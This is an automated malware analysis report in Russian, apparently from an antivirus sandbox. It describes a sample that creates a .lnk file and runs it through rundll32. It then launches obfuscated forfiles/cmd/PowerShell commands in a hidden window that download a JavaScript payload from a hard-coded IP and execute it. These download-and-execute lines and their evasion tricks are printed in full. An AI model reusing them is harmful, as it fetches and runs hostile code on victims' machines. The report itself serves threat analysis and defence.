Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\rundll32.exe' url.dll,OpenURL C:\Users\Public\skeml.lnk
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\skeml.lnk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\hogwart.js;C:\Users\Public\hogwart.js"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\hogwart.js;C:\Users\Public\hogwart.js"
- '<SYSTEM32>\cmd.exe' pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\hogwart.js;C:\Users\Public\hogwart.js
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /W 01 curl http://20#.#27.20.13/woke.js -o C:\Users\Public\hogwart.js;C:\Users\Public\hogwart.js
